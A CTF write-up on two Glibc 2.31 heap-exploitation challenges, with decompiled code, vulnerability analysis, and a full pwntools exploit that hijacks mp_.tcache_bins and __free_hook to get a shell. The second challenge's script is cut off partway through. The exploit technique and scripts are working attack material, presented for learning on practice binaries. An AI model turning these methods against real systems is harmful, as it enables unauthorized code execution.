free(*((void **)&chunks + ptr_idx_array[0]));

*((_QWORD *)&chunks + ptr_idx_array[0]) = 0; // pointer is cleared (no UAF), but the chunk's data is not wiped

return __readfsqword(0x28u) ^ v2;

}

This function frees a previously allocated heap chunk:

- Prompts: "Index :"

- Reads an integer index from user input into ptr_idx_array[0]

- Frees the chunk at chunks[index]

- Sets the freed pointer to NULL, which rules out the classic UAF route to a Largebin Attack.

Although the pointer to the freed chunk is nullified, the chunk's contents remain on the heap. free() writes libc addresses into the fd and bk fields of an unsorted-bin chunk, and add() does not clear memory, so reallocating that chunk with a short content and calling show() leaks those leftover pointers.
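Turning such a leak into a libc base is a small, mechanical step, sketched below with only the standard library. The 0x1ecbe0 offset is the one used by the exploit script later in this post and is specific to that libc build; the function name and the sample base address are illustrative assumptions.

```python
import struct

# Offset of the leaked unsorted-bin pointer from the libc base.
# Taken from the exploit script in this post; it differs for other libc builds.
LEAK_OFFSET = 0x1ECBE0


def leak_to_libc_base(raw6: bytes) -> int:
    """Convert the 6 leaked pointer bytes printed by puts() into a libc base."""
    if len(raw6) != 6:
        raise ValueError("expected exactly 6 bytes (puts() stops at the first NUL)")
    addr = struct.unpack("<Q", raw6.ljust(8, b"\x00"))[0]
    base = addr - LEAK_OFFSET
    if base & 0xFFF:
        raise ValueError("base is not page-aligned; wrong offset or corrupted leak")
    return base


# Hypothetical leak for a libc mapped at 0x7cda7bd5b000.
sample = struct.pack("<Q", 0x7CDA7BD5B000 + LEAK_OFFSET)[:6]
print(hex(leak_to_libc_base(sample)))  # 0x7cda7bd5b000
```

The page-alignment check is a cheap sanity test: a libc base that does not end in 0x000 almost always means the offset does not match the target's libc.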

show

unsigned __int64 show()

{

int idx; // [rsp+4h] [rbp-Ch] BYREF

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("Index :");

__isoc99_scanf("%d", &idx);

puts(*((const char **)&chunks + idx)); // if ptr=0, EOF

return __readfsqword(0x28u) ^ v2;

}

The show() function performs a raw pointer dereference: it simply prints the content of the chunk at the given index with puts(), without validating the index.

edit

unsigned __int64 edit()

{

_DWORD *ptr; // [rsp+0h] [rbp-10h] BYREF

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("one chance for you");

if ( chance )

exit(1);

puts("content :");

read(0, &ptr, 8u); // the 8 input bytes become ptr itself, i.e. the target address

*ptr = 666666;

++chance;

return __readfsqword(0x28u) ^ v2;

}

This function gives us a one-time constrained write:

- Prints: "one chance for you"

- Checks if chance is already used; if so, exits

- Prompts for input: "content :"

- Reads 8 bytes from the user into &ptr, meaning the user controls the value of ptr
  - I.e., user input becomes the target address to write to

- Writes the integer 666666 to *ptr

- Increments chance (prevents reuse)

Limitations:

- Fixed value: 666666

- Single-use due to chance

- 4-byte only (can't overwrite full 64-bit pointers)

Despite these constraints, it remains a powerful primitive when used to target the global mp_ (malloc_par) structure in Glibc:

- We can overwrite mp_.tcache_bins with that specific large value (666666)

- This causes the allocator to treat out-of-bounds bin indices as valid, effectively expanding the usable region of tcache->entries[]

- As a result, we gain a write-what-where by poisoning freelist entries beyond the bounds of tcache_perthread_struct.
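To see why a 4-byte write is enough here, the following sketch models the effect of storing a 32-bit 666666 into the low half of the 8-byte, little-endian mp_.tcache_bins field. The helper name is made up, and the chunk-size bound simply inverts the csize2tidx formula for 64-bit targets.

```python
import struct


def write_dword(qword_value: int, dword: int) -> int:
    """Overwrite the low 4 bytes of a little-endian 8-byte field."""
    raw = bytearray(struct.pack("<Q", qword_value))
    struct.pack_into("<I", raw, 0, dword)
    return struct.unpack("<Q", raw)[0]


# mp_.tcache_bins starts at 64; its upper 4 bytes are zero and stay untouched.
new_bins = write_dword(64, 666666)

# Largest chunk size whose index still satisfies tc_idx < tcache_bins.
max_chunk = 0x20 + (new_bins - 1) * 0x10

print(hex(new_bins))   # 0xa2c2a
print(hex(max_chunk))  # 0xa2c2b0
```

Since add() caps requests at 0x1000 bytes (chunk size 0x1010, bin index 0xff), every size the challenge lets us allocate becomes tcache-eligible after this single write.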

EXP

A detailed explanation is embedded in the comments of the following exploit script:

import sys
import inspect
from pwn import *

# p, mode, libc, remote_ip_addr and remote_port are set up elsewhere in the script.

s    = lambda data             : p.send(data)
sa   = lambda delim, data      : p.sendafter(delim, data)
sl   = lambda data             : p.sendline(data)
sla  = lambda delim, data      : p.sendlineafter(delim, data)
r    = lambda num=4096         : p.recv(num)
ru   = lambda delim, drop=True : p.recvuntil(delim, drop)
l64  = lambda                  : u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
uu64 = lambda data             : u64(data.ljust(8, b"\0"))


def g(gdbscript: str = ""):
    if mode["local"]:
        gdb.attach(p, gdbscript=gdbscript)
    elif mode["remote"]:
        gdb.attach((remote_ip_addr, remote_port), gdbscript)
    if gdbscript == "":
        raw_input()


def pa(addr: int) -> None:
    frame = inspect.currentframe().f_back
    variables = {k: v for k, v in frame.f_locals.items() if v is addr}
    desc = next(iter(variables.keys()), "unknown")
    success(f"[LEAK] {desc} ---> {addr:#x}")


def itoa(a: int) -> bytes:
    return str(a).encode()


def menu(n: int):
    opt = itoa(n)
    sla(b'Input your choice\n', opt)


def add(size, content):
    menu(1)
    size = itoa(size)
    sla(b'Size :\n', size)
    sa(b'Content :\n', content)


def free(idx):
    menu(2)
    idx = itoa(idx)
    sla(b'Index :\n', idx)


def edit(content):
    menu(3)
    sa(b'content :\n', content)


def show(idx):
    menu(4)
    idx = itoa(idx)
    sla(b'Index :\n', idx)

def exp():

# g("b free")

# g("breakrva 0x12be") # show: ret

"""

Leak libc

"""

add(0x500, b"aaaaaaaa") # 0: To rewrite tcache_entry for chunksize 0x510

add(0x500, b"/bin/sh\x00") # 1: Trigger __free_hook at the end

add(0x500, b"aaaaaaaa") # 2

add(0x500, b"aaaaaaaa") # 3

add(0x500, b"aaaaaaaa") # 4

free(2) # 2 -> usbin

add(0x500, b"bbbbbbbb") # 5 (2)

show(5)

ru(b"bbbbbbbb")

libc_base = uu64(r(6)) - 0x1ecbe0

pa(libc_base)

"""

Attack mp_

pwndbg> ptype /o *(struct malloc_par*)&mp_

/* offset | size */ type = struct malloc_par {

/* 0 | 8 */ unsigned long trim_threshold;

/* 8 | 8 */ size_t top_pad;

/* 16 | 8 */ size_t mmap_threshold;

/* 24 | 8 */ size_t arena_test;

/* 32 | 8 */ size_t arena_max;

/* 40 | 4 */ int n_mmaps;

/* 44 | 4 */ int n_mmaps_max;

/* 48 | 4 */ int max_n_mmaps;

/* 52 | 4 */ int no_dyn_threshold;

/* 56 | 8 */ size_t mmapped_mem;

/* 64 | 8 */ size_t max_mmapped_mem;

/* 72 | 8 */ char *sbrk_base;

/* 80 | 8 */ size_t tcache_bins;

/* 88 | 8 */ size_t tcache_max_bytes;

/* 96 | 8 */ size_t tcache_count;

/* 104 | 8 */ size_t tcache_unsorted_limit;

/* total size (bytes): 112 */

}

pwndbg> libc

libc : 0x7cda7bd5b000

pwndbg> distance ((char*)&mp_)+0x50 0x7cda7bd5b000

0x7cda7bf472d0->0x7cda7bd5b000 is -0x1ec2d0 bytes (-0x3d85a words)

"""

mp_tcache_bins = libc_base + 0x1ec2d0

system = libc_base + libc.sym.system

free_hook = libc_base + libc.sym.__free_hook

pa(mp_tcache_bins)

pa(system)

pa(free_hook)

# Write int 666666 into mp_.tcache_bins

edit(p64(mp_tcache_bins)) # 5

"""

Write tcache_entry[x] in the extended tcache_perthread_struct

typedef struct tcache_perthread_struct

{

uint16_t counts[TCACHE_MAX_BINS];

tcache_entry *entries[TCACHE_MAX_BINS];

} tcache_perthread_struct;

// in 64-bit Linux

// MINSIZE=0x20

// MALLOC_ALIGNMENT=2*SIZE_SZ=0x10

/* When "x" is from chunksize(). */

# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

/* With rounding and alignment, the bins are...

idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)

idx 1 bytes 25..40 or 13..20

idx 2 bytes 41..56 or 21..28

etc. */

x = tidx * MALLOC_ALIGNMENT + MINSIZE

x = tidx * 0x10 + 0x20

tidx = (x - 0x20) / 0x10

1st tcache_entry (0x20 tcachebin) at offset 0x80+0x10 from the chunk allocated for tcache_perthread_struct

"""

free(3) # 3 -> tcachebin

free(0) # 0 -> tcachebin

tidx = (0x510 - 0x20) // 0x10 # 0x4f

tcache_entry_offset = 0x10 + 0x80 + (tidx * 8) # 0x308

chunk_entry_offset = tcache_entry_offset - 0x290 - 0x10 # 0x68

# g("breakrva 0x1680") # main: scanf

# pause()

pl = flat({

chunk_entry_offset: p64(free_hook)

}, filler=b"\0")

add(0x500, pl) # 6 (0)

"""

pwndbg> vis -a

0x612bade1d000 0x0000000000000000 0x0000000000000291 <--- heap_base

0x612bade1d010 0x0000000000000000 0x0000000000000000

0x612bade1d020 0x0000000000000000 0x0000000000000000

...

0x612bade1d280 0x0000000000000000 0x0000000000000000

0x612bade1d290 0x0000000000000000 0x0000000000000511

0x612bade1d2a0 0x0000000000000000 0x0000000000000000

0x612bade1d2b0 0x0000000000000000 0x0000000000000000

0x612bade1d2c0 0x0000000000000000 0x0000000000000000

0x612bade1d2d0 0x0000000000000000 0x0000000000000000

0x612bade1d2e0 0x0000000000000000 0x0000000000000000

0x612bade1d2f0 0x0000000000000000 0x0000000000000000

0x612bade1d300 0x0000000000000000 0x0000713798e40e48 <--- tcache_entry for chunksize 0x510

pwndbg> tel 0x0000713798e40e48

00:0000│ 0x713798e40e48 (__free_hook) ◂— 0x0

"""

# Next malloc(0x500) will allocate the tcachebin chunk pointed by the hijacked tcache_entry

add(0x500, p64(system)) # 7 (3)

# __free_hook hijacked

free(1)

p.interactive()

if __name__ == '__main__':

FILE_PATH = "./pwn"

LIBC_PATH = "./libc.so.6"

context(arch="amd64", os="linux", endian="little")

context.log_level = "debug"

context.terminal = ['tmux', 'splitw', '-h']

e = ELF(FILE_PATH, checksec=False)

mode = {"local": False, "remote": False, }

env = None

print("Usage: python3 xpl.py [<ip> <port>]\n"

" - If no arguments are provided, runs in local mode (default).\n"

" - Provide <ip> and <port> to target a remote host.\n")

if len(sys.argv) == 3:

if LIBC_PATH:

libc = ELF(LIBC_PATH)

p = remote(sys.argv[1], int(sys.argv[2]))

mode["remote"] = True

remote_ip_addr = sys.argv[1]

remote_port = int(sys.argv[2])

elif len(sys.argv) == 1:

if LIBC_PATH:

libc = ELF(LIBC_PATH)

env = {

"LD_PRELOAD": os.path.abspath(LIBC_PATH),

"LD_LIBRARY_PATH": os.path.dirname(os.path.abspath(LIBC_PATH))

}

p = process(FILE_PATH, env=env)

mode["local"] = True

else:

print("[-] Error: Invalid arguments provided.")

sys.exit(1)



exp()Pwned after we've successfully hijacked __free_hook:
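The offset arithmetic used in the script can be checked in isolation. The sketch below ports the csize2tidx macro quoted in the script and assumes the Glibc 2.31 layout of this challenge (64 default bins, 2-byte counters, a 0x10-byte chunk header, and the tcache chunk sitting at heap_base). The helper names are illustrative and are not part of pwntools or Glibc.

```python
# Constants for 64-bit Glibc 2.31 (assumed, matching the layout quoted in the script).
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10
TCACHE_MAX_BINS = 64   # default number of tcache bins
CHUNK_HDR = 0x10       # prev_size + size
COUNT_SIZE = 2         # sizeof(uint16_t)
PTR_SIZE = 8


def csize2tidx(chunk_size: int) -> int:
    """Python port of the csize2tidx macro."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def entry_offset(chunk_size: int) -> int:
    """Offset of entries[tidx] from heap_base (start of the tcache chunk)."""
    entries_start = CHUNK_HDR + COUNT_SIZE * TCACHE_MAX_BINS  # 0x90
    return entries_start + csize2tidx(chunk_size) * PTR_SIZE


tidx = csize2tidx(0x510)
off = entry_offset(0x510)
# Chunk 0 starts at heap_base + 0x290, so its user data starts 0x10 later.
in_chunk0 = off - 0x290 - CHUNK_HDR
print(hex(tidx), hex(off), hex(in_chunk0))
```

The three printed values correspond to tidx, tcache_entry_offset, and chunk_entry_offset in the exploit: the "entry" for the 0x510 bin lies past the real tcache_perthread_struct, inside the user data of chunk 0.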

CTF 2: with Largebin Attack



Overview

Binary download: link

This binary is vulnerable to a use-after-free (UAF) condition, which enables a classic Largebin Attack — allowing us to write a controlled heap address to an arbitrary memory location. There are several viable paths to full exploitation here, such as IO structure hijacking (House of Apple, House of Emma, House of Banana, House of Kiwi, House of Husk, etc.) which require even fewer constraints. However, the focus of this writeup is to demonstrate how to leverage a Largebin Attack to corrupt the global mp_ (malloc_par) structure, thereby gaining control over tcache bin allocation behavior for further heap exploitation.
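To make the write primitive concrete, here is a simplified model of the pointer updates that happen when a chunk is sorted into a large bin and is smaller than every chunk already there. It assumes the Glibc 2.31 insertion path and the 64-bit malloc_chunk layout (fd_nextsize at 0x20, bk_nextsize at 0x28). Memory is modelled as a plain dict, and all addresses are illustrative.

```python
# Field offsets inside struct malloc_chunk on 64-bit (measured from the chunk header).
FD_NEXTSIZE = 0x20
BK_NEXTSIZE = 0x28


def insert_as_smallest(mem: dict, largest: int, victim: int) -> None:
    """Model the nextsize updates when `victim` becomes the smallest chunk in the bin."""
    old_bk_ns = mem[largest + BK_NEXTSIZE]   # attacker-controlled through the UAF
    mem[victim + FD_NEXTSIZE] = largest
    mem[victim + BK_NEXTSIZE] = old_bk_ns
    mem[old_bk_ns + FD_NEXTSIZE] = victim    # the stray write into the target
    mem[largest + BK_NEXTSIZE] = victim


# Illustrative addresses only.
target = 0x7a4eeda652d0    # e.g. &mp_.tcache_bins
largest = 0x571d44620290   # chunk already sitting in the large bin
victim = 0x571d44620b60    # smaller chunk being sorted into the same bin

# UAF write: point the freed chunk's bk_nextsize at target - 0x20.
mem = {largest + BK_NEXTSIZE: target - 0x20}
insert_as_smallest(mem, largest, victim)
print(hex(mem[target]))
```

The -0x20 adjustment exists because the allocator writes to the fd_nextsize field of whatever bk_nextsize points at, and that field sits 0x20 bytes into a chunk. The value written is the header address of the inserted chunk, which we do not choose, but any heap address is large enough for our purpose.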

All protections are enabled, and the binary is stripped:

$ checksec pwdPro

[*] '/home/Axura/ctf/pwn/pwdPro_mp_2.31/pwdPro'

Arch: amd64-64-little

RELRO: Full RELRO

Stack: Canary found

NX: NX enabled

PIE: PIE enabled

SHSTK: Enabled

IBT: Enabled

$ file pwdPro

pwdPro: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0cf87abb0c2c119db0081f9c5e07fd0f028a5480, for GNU/Linux 3.2.0, stripped

This challenge uses Glibc 2.31, where the malloc hooks are still functional. The malloc-related hooks (__malloc_hook, __free_hook, __realloc_hook, etc.) were removed from the API in Glibc 2.34; from that release on they no longer influence allocator behavior, and only compatibility symbols remain for legacy binaries.

Code Review

ready

unsigned int ready()

{

unsigned int seed; // eax

__int64 v2; // [rsp+0h] [rbp-10h]

setbuf(stdin, 0);

setbuf(stdout, 0);

seed = time(0);

srand(seed);

v2 = (__int64)rand() << 32;

qword_4040 = v2 + rand();

return alarm(0x30u);

}

This function sets up the environment and initializes a pseudo-random 64-bit value that serves as the password key, presumably to make brute-forcing harder.

It also sets an alarm that terminates the process after 48 seconds (0x30). For debugging, we can patch the alarm call out of the binary (the patching trick itself is out of scope for this post).
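The structure of the key is worth a quick look, because it gives us a cheap sanity check for a recovered value. The sketch below mirrors the arithmetic in ready() and assumes glibc's RAND_MAX of 0x7fffffff; the function names are made up for illustration.

```python
RAND_MAX = 0x7FFFFFFF  # glibc's RAND_MAX: each rand() result fits in 31 bits


def make_key(r1: int, r2: int) -> int:
    """Mirror of ready(): key = ((int64)rand() << 32) + rand()."""
    assert 0 <= r1 <= RAND_MAX and 0 <= r2 <= RAND_MAX
    return (r1 << 32) + r2


def plausible_key(key: int) -> bool:
    """Bits 31 and 63 are never set, since each half is at most RAND_MAX."""
    return (key >> 63) == 0 and ((key >> 31) & 1) == 0


key = make_key(0x12345678, 0x7FFFFFFF)
print(hex(key), plausible_key(key))
```

If a key recovered from a leak fails plausible_key(), the leak was most likely truncated or misaligned.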

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)

{

char opt; // [rsp+7h] [rbp-9h] BYREF

unsigned __int64 v4; // [rsp+8h] [rbp-8h]

v4 = __readfsqword(0x28u);

ready(a1, a2, a3);

dummy_bar();

while ( 1 )

{

menu_bar();

__isoc99_scanf("%c", &opt);

switch ( opt )

{

case '1':

add();

break;

case '2':

edit();

break;

case '3':

show();

break;

case '4':

delete();

break;

case '5':

recover();

break;

case '6':

exit(8);

default:

continue;

}

}

}

The menu loop reads a single character (opt) as the user's choice and calls the corresponding function:

- '1' → add()
- '2' → edit()
- '3' → show()
- '4' → delete()
- '5' → recover() ← new
- '6' → exit(8)
- Any other input → no-op (loop continues)

add

unsigned __int64 add()

{

unsigned int size; // [rsp+8h] [rbp-18h] BYREF

unsigned int box_idx; // [rsp+Ch] [rbp-14h] BYREF

char *s; // [rsp+10h] [rbp-10h]

unsigned __int64 v4; // [rsp+18h] [rbp-8h]

v4 = __readfsqword(0x28u);

size = 0;

puts("Which PwdBox You Want Add:");

__isoc99_scanf("%u", &box_idx);

if ( box_idx <= 0x4F )

{

printf("Input The ID You Want Save:");

getchar();

read(0, (char *)&unk_4060 + 32 * box_idx, 0xFu);

*((_BYTE *)&unk_406F + 32 * box_idx) = 0;

printf("Length Of Your Pwd:");

__isoc99_scanf("%u", &size);

if ( size > 0x41F && size <= 0x888 )

{

s = (char *)malloc(size);

printf("Your Pwd:");

getchar();

fgets(s, size, stdin);

encrypt((__int64)s, size);

*((_DWORD *)&unk_4078 + 8 * box_idx) = size; // store size

*((_QWORD *)&unk_4070 + 4 * box_idx) = s; // store ptr

dword_407C[8 * box_idx] = 1; // mark occupied

if ( !qword_4048 )

{

printf("First Add Done.Thx 4 Use. Save ID:%s", *((const char **)&unk_4070 + 4 * box_idx));

qword_4048 = 1;

}

}

else

{

puts("Why not try To Use Your Pro Size?");

}

}

return __readfsqword(0x28u) ^ v4;

}

It allocates and stores an encrypted password entry in the "PwdBox" system:

- Prompts for box_idx (must be ≤ 0x4F → max 80 entries)
- Reads and stores a user-provided ID (15 bytes max) at: (char *)&unk_4060 + 32 * box_idx
- Prompts for password size:
  - Must be in range 0x420 to 0x888 (i.e., allows only largebin chunks under some size restriction)
- Allocates a chunk of given size and stores password input via fgets()
- Calls encrypt() on the password
- Saves:
  - ptr to password
  - size
  - usage flag
- Prints a message if this is the first added entry (qword_4048 == 0)

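The first-add message prints the encrypted password buffer (the "Save ID:%s" argument is the password pointer, not the ID), i.e., our input XORed with the key initialized by ready(). Because we know the plaintext, we can recover the randomly generated key from this output and later use it to decode a leaked libc address.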
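The size restriction is what makes mp_ an interesting target here. As a quick check, the sketch below ports Glibc's request2size and csize2tidx macros for 64-bit and assumes the default of 64 tcache bins; it shows that no request the program accepts can reach the tcache unless mp_.tcache_bins is enlarged.

```python
# 64-bit Glibc constants (assumed defaults).
SIZE_SZ = 8
MALLOC_ALIGNMENT = 0x10
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 0x20
DEFAULT_TCACHE_BINS = 64


def request2size(req: int) -> int:
    """Chunk size used for malloc(req): add the size field, round up to 0x10."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


def csize2tidx(chunk_size: int) -> int:
    """Python port of the csize2tidx macro."""
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


for req in (0x420, 0x450, 0x460, 0x888):
    csize = request2size(req)
    tidx = csize2tidx(csize)
    print(f"malloc({req:#x}) -> chunk {csize:#x}, tidx {tidx}, "
          f"tcache by default: {tidx < DEFAULT_TCACHE_BINS}")
```

Even the smallest accepted request (0x420) yields index 65, just past the default limit, so every chunk we can create is handled by the unsorted and large bins until the limit is corrupted.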

encrypt/decrypt

__int64 __fastcall encrypt(__int64 pwd, int pwd_len)

{

__int64 result; // rax

int v3; // [rsp+14h] [rbp-18h]

int i; // [rsp+18h] [rbp-14h]

// XOR each 8-byte block with a uint64 key

v3 = 2 * (pwd_len / 16);

if ( pwd_len % 16 <= 8 )

{

if ( pwd_len % 16 > 0 )

++v3;

}

else

{

v3 += 2;

}

for ( i = 0; ; ++i )

{

result = (unsigned int)i;

if ( i >= v3 )

break;

*(_QWORD *)(8LL * i + pwd) ^= qword_4040;

}

return result;

}

Performs a simple XOR-based encryption on the user’s password buffer.

- pwd: pointer to password buffer
- pwd_len: user-specified length
- qword_4040: 64-bit global key (randomized by ready())

The encrypt and decrypt functions are identical in this program: each XORs every 8-byte block of the password buffer with the global 64-bit key.
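A small Python model of the routine helps confirm two things: the block count computed from pwd_len is simply the length rounded up to whole 8-byte blocks, and applying the routine twice restores the original buffer. This is a sketch of the decompiled logic, not the binary's code, and the key value is a hypothetical placeholder.

```python
import struct


def block_count(pwd_len: int) -> int:
    """Mirror of the v3 computation in the decompiled encrypt()."""
    n = 2 * (pwd_len // 16)
    rem = pwd_len % 16
    if rem <= 8:
        if rem > 0:
            n += 1
    else:
        n += 2
    return n


def xor_blocks(buf: bytes, pwd_len: int, key: int) -> bytes:
    """XOR the first block_count(pwd_len) little-endian qwords of buf with key."""
    out = bytearray(buf)
    for i in range(block_count(pwd_len)):
        (word,) = struct.unpack_from("<Q", out, 8 * i)
        struct.pack_into("<Q", out, 8 * i, word ^ key)
    return bytes(out)


demo_key = 0x1F2E3D4C5B6A7988  # hypothetical key, for illustration only
plain = b"A" * 0x460
cipher = xor_blocks(plain, 0x460, demo_key)
print(block_count(0x460), xor_blocks(cipher, 0x460, demo_key) == plain)
```

Because XOR is its own inverse, show() can call decrypt() before printing and encrypt() afterwards without needing a second routine.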

Since the first-add message in add() leaks the encrypted ciphertext, we can supply a known 8-byte input and XOR it with the leaked block to recover the randomly generated password key.
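The key recovery is a one-line known-plaintext attack. The sketch below simulates it without the target binary; the key is a hypothetical value and recover_key is an illustrative helper name.

```python
import struct


def recover_key(leaked: bytes, known_plaintext: bytes) -> int:
    """XOR the first leaked 8-byte block with the plaintext we sent."""
    if len(leaked) < 8 or len(known_plaintext) < 8:
        raise ValueError("need a full 8-byte block of both ciphertext and plaintext")
    (c,) = struct.unpack("<Q", leaked[:8])
    (p,) = struct.unpack("<Q", known_plaintext[:8])
    return c ^ p


# Simulate what the program would print for the input b"aaaaaaaa".
secret_key = 0x1F2E3D4C5B6A7988  # hypothetical key, for illustration only
plaintext = b"aaaaaaaa"
leaked = struct.pack("<Q", struct.unpack("<Q", plaintext)[0] ^ secret_key)
print(hex(recover_key(leaked, plaintext)))
```

One caveat: the leak goes through printf("%s"), which stops at the first NUL byte. If a key byte happens to equal the plaintext byte at the same position, the output is shorter than 8 bytes, and the exploit should be rerun or a different filler byte used.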

delete

unsigned __int64 delete()

{

unsigned int box_idx; // [rsp+4h] [rbp-Ch] BYREF

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("Idx you want 2 Delete:");

__isoc99_scanf("%u", &box_idx);

if ( box_idx <= 0x4F && dword_407C[8 * box_idx] )

{

free(*((void **)&unk_4070 + 4 * box_idx));

dword_407C[8 * box_idx] = 0; // in-use flag

}

return __readfsqword(0x28u) ^ v2;

}

Frees a previously allocated password entry in the "PwdBox":

- Prompts user for box_idx (must be ≤ 0x4F → max 80 entries)
- Checks if the slot is marked as in use: dword_407C[8 * box_idx] != 0
- If valid:
  - Frees the heap pointer at *((void **)&unk_4070 + 4 * box_idx)
  - Clears the in-use flag: dword_407C[8 * box_idx] = 0

This function frees a password chunk and clears its "occupied" flag, but it leaves the stored pointer in place. Since the flag gates access to the slot, delete() on its own does not expose a UAF.

recover

unsigned __int64 recover()

{

unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("Idx you want 2 Recover:");

__isoc99_scanf("%u", &v1);

if ( v1 <= 0x4F && !dword_407C[8 * v1] )

{

dword_407C[8 * v1] = 1; // in-use flag

puts("Recovery Done!");

}

return __readfsqword(0x28u) ^ v2;

}

Restores access to a previously deleted "PwdBox" entry without reallocating memory:

- Prompts: "Idx you want 2 Recover:"
- Reads v1 as box index
- If:
  - v1 ≤ 0x4F (valid index)
  - dword_407C[8 * v1] == 0 (i.e., previously deleted)
- Then:
  - Sets dword_407C[8 * v1] = 1 to mark it as "in-use" again
  - Prints "Recovery Done!"

This function restores the "in-use" flag for an entry without reallocating or updating the pointer. If the chunk referenced by the slot's pointer (*((void **)&unk_4070 + 4 * box_idx)) was freed via delete(), calling recover() re-enables access through the dangling pointer, which gives us an unlimited UAF vulnerability.

Therefore, we can call recover() after delete() as many times as we like, which makes the Largebin Attack easy to set up.
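The flag logic is easy to model. The toy state machine below tracks only the stored pointer, the in-use flag, and the set of live allocations; it is a sketch of the bookkeeping described above, with invented class and method names, and it does not touch a real heap.

```python
class PwdBoxModel:
    """Toy model of the slot table: pointer plus in-use flag per box."""

    def __init__(self, slots: int = 0x50):
        self.ptr = [None] * slots
        self.in_use = [False] * slots
        self.live = set()          # pointers that are currently allocated
        self._next_ptr = 0x1000    # fake allocator cursor

    def add(self, idx: int) -> None:
        p = self._next_ptr
        self._next_ptr += 0x470
        self.live.add(p)
        self.ptr[idx] = p
        self.in_use[idx] = True

    def delete(self, idx: int) -> None:
        if self.in_use[idx]:
            self.live.discard(self.ptr[idx])  # free(ptr); the pointer is NOT cleared
            self.in_use[idx] = False

    def recover(self, idx: int) -> None:
        if not self.in_use[idx]:
            self.in_use[idx] = True           # no check that ptr is still live

    def is_dangling(self, idx: int) -> bool:
        """True if the slot is usable but its chunk has been freed."""
        p = self.ptr[idx]
        return self.in_use[idx] and p is not None and p not in self.live


m = PwdBoxModel()
m.add(0)
m.delete(0)
print(m.is_dangling(0))   # flag cleared, slot not usable yet
m.recover(0)
print(m.is_dangling(0))   # flag restored on a freed chunk
```

The same sequence can be repeated on any slot, which is why the exploit can read, edit, and even free a chunk again after it has been released.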

show

unsigned __int64 show()

{

unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF

unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);

puts("Which PwdBox You Want Check:");

__isoc99_scanf("%u", &v1);

getchar();

if ( v1 <= 0x4F )

{

if ( dword_407C[8 * v1] )

{

decrypt(*((_QWORD *)&unk_4070 + 4 * v1), *((_DWORD *)&unk_4078 + 8 * v1));

printf(

"IDX: %d\nUsername: %s\nPwd is: %s",

v1,

(const char *)&unk_4060 + 32 * v1,

*((const char **)&unk_4070 + 4 * v1));

encrypt(*((_QWORD *)&unk_4070 + 4 * v1), *((_DWORD *)&unk_4078 + 8 * v1));

}

else

{

puts("No PassWord Store At Here");

}

}

return __readfsqword(0x28u) ^ v2;

}

Displays a decrypted password entry for a given "PwdBox" index.

- Prompts: "Which PwdBox You Want Check:"
- Reads user input into v1 (box index)
- If: v1 ≤ 0x4F and dword_407C[8 * v1] != 0 (marked in-use)
- Then:
  - Calls decrypt(ptr, size) on the password buffer
  - Prints:
    - Box index
    - Stored username: unk_4060 + 32 * v1
    - Password: dereferenced from unk_4070 + 4 * v1
  - Re-encrypts the password with encrypt() after displaying

With the UAF primitive, show() lets us leak a libc address (for example, the unsorted bin pointer left in a chunk after it is freed into that bin), although the output is XORed with the key because show() runs decrypt() first. Once we have recovered the password key, we XOR the leaked bytes with it to recover the libc address.
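Decoding the leak is the reverse of what show() does to the freed chunk. The sketch below assumes the unsorted-bin offset 0x1ecbe0 used in the exploit script (specific to this libc build) and a hypothetical key; decode_libc_base is an illustrative helper.

```python
import struct

UNSORTED_BIN_OFFSET = 0x1ECBE0  # offset used in the script; specific to this libc build


def decode_libc_base(raw: bytes, key: int, offset: int = UNSORTED_BIN_OFFSET) -> int:
    """Undo the XOR applied by show() and subtract the known offset."""
    (masked,) = struct.unpack("<Q", raw[:8].ljust(8, b"\0"))
    fd = masked ^ key
    base = fd - offset
    if base & 0xFFF:
        raise ValueError("result is not page-aligned; wrong key or wrong offset?")
    return base


# Simulated leak: a freed chunk's fd pointer, XORed with the key by decrypt().
demo_key = 0x1F2E3D4C5B6A7988   # hypothetical key, for illustration only
demo_base = 0x7A4EED879000      # libc base taken from the debugging session in the script
raw = struct.pack("<Q", (demo_base + UNSORTED_BIN_OFFSET) ^ demo_key)
print(hex(decode_libc_base(raw, demo_key)))
```

The page-alignment check is a cheap guard: a libc base always ends in 0x000, so anything else means the key or the offset is wrong.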

EXP

Detailed explanation is embedded in the comments of the following exploit script:

import sys

import inspect

from pwn import *

s = lambda data :p.send(data)

sa = lambda delim,data :p.sendafter(delim, data)

sl = lambda data :p.sendline(data)

sla = lambda delim,data :p.sendlineafter(delim, data)

r = lambda num=4096 :p.recv(num)

ru = lambda delim, drop=True :p.recvuntil(delim, drop)

l64 = lambda :u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))

uu64 = lambda data :u64(data.ljust(8, b"\0"))

def g(gdbscript: str = ""):

if mode["local"]:

gdb.attach(p, gdbscript=gdbscript)

elif mode["remote"]:

gdb.attach((remote_ip_addr, remote_port), gdbscript)

if gdbscript == "":

raw_input()

def pa(addr: int) -> None:

frame = inspect.currentframe().f_back

variables = {k: v for k, v in frame.f_locals.items() if v is addr}

desc = next(iter(variables.keys()), "unknown")

success(f"[LEAK] {desc} ---> {addr:#x}")

def itoa(n: int) -> bytes:

return str(n).encode()

def menu(n: int):

opt = itoa(n)

